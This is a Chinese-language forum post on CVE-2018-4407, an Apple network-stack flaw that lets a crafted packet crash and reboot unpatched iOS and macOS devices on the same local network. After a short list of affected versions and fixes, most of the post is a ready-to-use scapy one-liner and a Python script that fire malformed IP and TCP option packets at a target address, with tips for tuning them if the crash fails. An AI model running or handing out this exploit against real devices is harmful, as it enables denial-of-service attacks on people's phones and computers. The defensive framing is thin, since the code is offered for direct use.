本帖最后由 co3site 于 2018-11-10 14:01 编辑
CVE-2018-4407 为 Apple 设备的系统网络核心代码中出现的漏洞,利用该漏洞可以向同一局域网下的 Apple 设备发送的特定的 ICMP 数据包从而使目标设备崩溃后强制重启。苹果在10月30日推出的 iOS 12.1 更新包中彻底修复了这个漏洞。受影响的设备如下:
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)
Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)
Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005修复)
Apple OS X El Capitan 及更早版本:所有设备
- 直接利用:
sudo scapy
send(IP(dst=“Target_IP“,options[IPOption(“A”*8)])/TCP(dport=8443,options=[(19, “1"*18),(19, “2”*18)]))
利用过程中,如若未成功。自行修改 "A"*8 ==> "A"*18,或更大,端口修改为其他的开放端口进行测试。
- 采用 python 脚本进行利用:
# CVE-2018-4407 ICMP DOS
import sys
try:
from scapy.all import *
except Exception as e:
print (" You need install scapy first:\n sudo pip install scapy ")
if __name__ == '__main__':
port = 8443 #端口可修改为其他开放端口进行测试
try:
check_ip = sys.argv[1]
print (" !!!!!! exploit !!!!!!")
print (" Trying CVE-2018-4407 ICMP DOS " + check_ip)
for i in range(8,50):
send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=port,options=[(19, "1"*18),(19, "2"*18)]))
print (" Check Over!! ")
except Exception as e:
print " usage: sudo python this.py Target_IP"
|